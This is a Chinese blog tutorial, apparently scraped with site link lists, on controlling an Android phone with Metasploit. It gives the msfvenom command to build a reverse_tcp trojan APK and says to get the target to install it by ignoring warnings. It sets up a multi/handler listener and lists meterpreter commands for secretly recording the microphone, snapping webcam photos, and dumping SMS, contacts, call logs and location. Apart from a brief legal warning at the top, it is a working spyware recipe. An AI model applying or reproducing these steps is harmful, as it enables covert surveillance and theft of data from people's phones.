|>>>中华人民共和国网络安全法<<<|警告:请勿用于非法用途,后果自负!

0.环境

  • 虚拟机 KaliLinux
  • 手机 Redmi 6A
  • 同一局域网下

1.查看控制端IP

ifconfig

即192.168.xx.xxx

2.生成木马程序

>>>msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.xx.xxx lport=9999 R>/home/hugboy/桌面/Share/hugboyMsf.apk

-设置监听端主机lhost=192.168.xx.xxx

-设置监听端主机端口lhost=5555

-保存到指定目录R>/home/hugboy/桌面/hugboyMsf.apk



自动生成了一个10179 bytes 大小的程序

3.把hugboyMsf.apk安装到目标手机并运行

1).如何让虚拟机与主机数据分享,进而发送到手机上安装?

安装VMtools直接拖到本地桌面

Apt update

Apt install open-vm-tools-desktop fuse

Reboot

重启生效

2).发送到手机安装,忽略警告,点击继续。。。

4.打开metasploit工具



5.设置payload

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.xx.xxx

set LPORT 5555


exploit

6.显示meterpreter>说明连接成功

常用命令

+麦克风

-record_mic 从麦克风huhugb录制音频X秒

-h 帮助

-d 记录秒数

-F 音频保存路径,默认 HOME/xxxx.wav

-p 自动播放捕获的音频

+webcam_list 列出手机摄像头个数

+webcam_snap 从指定摄像头拍摄照片

-h 帮助

-I 选择要使用的摄像头

-p 图片路径,默认HOME/xxxx.jpeg

-q 图片质量,默认为50

-v 自动查看图片

+webcam_chat 开始视频聊天

+webcam_stream 从摄像拍摄视频

演示

列出设备的摄像头

webcma_list

选择第一个摄像头(后置摄像头)拍照

webcam_snap -i 1

全部命令

help

Stdapi: File system Commands

Command       Description

-------       -----------

cat           Read the contents of a file to the screen

cd            Change directory

checksum      Retrieve the checksum of a file

cp            Copy source to destination

dir           List files (alias for ls)

download      Download a file or directory

edit          Edit a file

getlwd        Print local working directory

getwd         Print working directory

lcd           Change local working directory

lls           List local files

lpwd          Print local working directory

ls            List files

mkdir         Make directory

mv            Move source to destination

pwd           Print working directory

rm            Delete the specified file

rmdir         Remove directory

search        Search for files

upload        Upload a file or directory

Stdapi: Networking Commands

Command       Description

-------       -----------

ifconfig      Display interfaces

ipconfig      Display interfaces

portfwd       Forward a local port to a remote service

route         View and modify the routing table

Stdapi: System Commands

Command       Description

-------       -----------

execute       Execute a command

getuid        Get the user that the server is running as

localtime     Displays the target system's local date and time

pgrep         Filter processes by name

ps            List running processes

shell         Drop into a system command shell

sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

Command       Description

-------       -----------

screenshare   Watch the remote user's desktop in real time

screenshot    Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands

Command        Description

-------        -----------

record_mic     Record audio from the default microphone for X seconds

webcam_chat    Start a video chat

webcam_list    List webcams

webcam_snap    Take a snapshot from the specified webcam

webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands

Command       Description

-------       -----------

play          play a waveform audio file (.wav) on the target system

Android Commands

Command           Description

-------           -----------

activity_start    Start an Android activity from a Uri string

check_root        Check if device is rooted

dump_calllog      Get call log

dump_contacts     Get contacts list

dump_sms          Get sms messages

geolocate         Get current lat-long using geolocation

hide_app_icon     Hide the app icon from the launcher

interval_collect  Manage interval collection capabilities

send_sms          Sends SMS from target session

set_audio_mode    Set Ringer Mode

sqlite_query      Query a SQLite database from storage

wakelock          Enable/Disable Wakelock

wlan_geolocate    Get current lat-long using WLAN information

Application Controller Commands

Command        Description

-------        -----------

app_install    Request to install apk file

app_list       List installed apps in the device

app_run        Start Main Activty for package name

app_uninstall  Request to uninstall application

Msf--控制 Android手机的更多相关文章

  1. PC端轻松控制Android手机,PC Control Andoroid,PC控制安卓手机

    记录此次经历的目的是帮助需要的人或下次使用时少走弯路,我为此试用了不少工具及方法,因为追求免费,像"Weak Control:在PC上控制你的Android手机"还要收费的我就不弄 ...

  2. 苹果如何控制android手机,安卓手机怎么控制苹果?

    小编经常通过手机远程控制别人手机,帮助他人解决一些电脑问题,另外还经常需要通过远程电脑控制服务器,管理脚本之家的服务器等等,可能这些对大家都没有什么诱惑,今天笔者为大家带来一个非常有趣的手机控制电脑的 ...

  3. Scrcpy用电脑控制Android手机(支持Windows/macOS/Linux)

    一.scrcpy简介 注意:拼写是scrcpy,非Python爬虫框架Scrapy. scrcpy可以通过adb调试的方式来将手机屏幕投到电脑上,并可以通过电脑控制您的Android设备.它可以通过U ...

  4. 单片机与android手机通信(控制LED小灯亮灭)

    1.单片机实验板功能设计 为验证数据通信内容,让单片机板上的四个按键与android手机客户端上的四个LED灯相互控制:为达到上述基本实验要求,采用单字符传输数据即可,硬件需设计两块相同的单片机电路板 ...

  5. 用鼠标键盘来控制你的Android手机——同屏显示简单教程

    今天在微博上看到有人用电脑鼠标操作iPhone手机玩打飞机游戏,非常炫,虽然自己用的不是iPhone,但相信Android手机肯定也能实现这样的功能,于是网上各种搜索方法,终于看到了一篇试用成功的帖子 ...

  6. 我的Android进阶之旅------>Android实现用Android手机控制PC端的关机和重启的功能(三)Android客户端功能实现

    我的Android进阶之旅------>Android实现用Android手机控制PC端的关机和重启的功能(一)PC服务器端(地址:http://blog.csdn.net/ouyang_pen ...

  7. 电脑控制Android设备的软件——Total Control

    最早开始搞Android开发时,为了调试方便,想找一个Android下的远程控制软件,支持在电脑端远程控制和同步显示Android设备.先后试了360手机助手.Mobizen.Vysor和Mirror ...

  8. Pyqt adb 获取Android手机屏幕

    adb的全称为Android Debug Bridge,就是起到调试桥的作用.adb的工作方式比较特殊,采用监听Socket TCP 5554等端口的方式让IDE和Qemu通讯,默认情况下adb会da ...

  9. GPS部标平台的架构设计(六)-Android手机客户端和手机查车设计

    对于GPS软件平台,虽然有功能非常丰富的PC端或BS客户端,但是客户也是需要移动客户端来作为自己的辅助工具,也是需要的.做为GPS平台的设计者和开发者,在开发移动客户端的时候,也需要从常规的服务器开发 ...

  10. 为什么iphone手机比android手机流畅

    作为当下最流行.市场占用份额最大的两大手机操作系统IOS和android,目前两者加起来的市场占用率达到90%.我曾经一直用android手机,没有用过iphone,那时候正直iphone4和ipho ...

随机推荐

  1. HTML5获取地理位置定位信息

    如何使用HTML5地理位置定位功能 定位功能(Geolocation)是HTML5的新特性,因此只有在支持HTML5的现代浏览器上运行,特别是手持设备如iphone,地理定位更加精确.首先我们要检测用 ...

  2. day-03-基础数据类型

    基础数类型总览 10203 123 3340 int +- * / 等等 '今天吃了没?' str 存储少量的数据,+ *int 切片, 其他操作方法 True False bool 判断真假 [12 ...

  3. 消息中间件-RabbitMQ持久化机制、内存磁盘控制

    RabbitMQ持久化机制 RabbitMQ内存控制 RabbitMQ磁盘控制 RabbitMQ持久化机制 重启之后没有持久化的消息会丢失 package com.study.rabbitmq.a13 ...

  4. 2-69.x的平方根

    题目描述: 解题思路: 计算平方根可以依次通过自然数递增,来判断两者相乘是否为目标值,是一个有序的序列,因此考虑使用二分查找. 由于x=0和1时,就是其本身,单独拿出来.当x>1时,其平方根一定 ...

  5. Linux pgrep命令

    1 pgrep pgrep是一个根据名称查找进程ID的命令,返回的是进程ID,若存在当个进程,则分为不同的行返回ID(默认实现). 2 示例 查找java进程: pgrep java 上图还显示了ps ...

  6. [ERROR]: gitstatus failed to initialize.

    1 问题描述 Manjaro升级后,zsh的主题p10k出现的问题. Your git prompt may disappear or become slow. Run the following c ...

  7. 横趟!面试中遇到的 ZooKeeper 问题

    本文作者:HelloGitHub-老荀 本文是 HelloZooKeeper 系列的最后一篇文章,接下来主要聊聊面试中如果被问到 ZooKeeper 的问题如何回答,也可以当作学完本系列的测试. 准备 ...

  8. Laravel路由中不固定数量的参数如何实现?

    前言 laravel是个好框架,我也在学习和使用,并且在公司里推广,最近在读 Laravel 源码的时候,发现了一个段特别有趣的代码,大家请看: ... 这三个点是做什么用的呢?我查了 PHP 的手册 ...

  9. DonkeyID---php扩展-64位自增ID生成器

    ##原理 参考Twitter-Snowflake 算法,扩展了其中的细节.具体组成如下图: 如图所示,64bits 咱们分成了4个部分. 毫秒级的时间戳,有42个bit.能够使用139年,从1970年 ...

  10. Python脚本抓取京东手机的配置信息

    以下代码是使用python抓取京东小米8手机的配置信息 首先找到小米8商品的链接:https://item.jd.com/7437788.html 然后找到其配置信息的标签,我们找到其配置信息的标签为 ...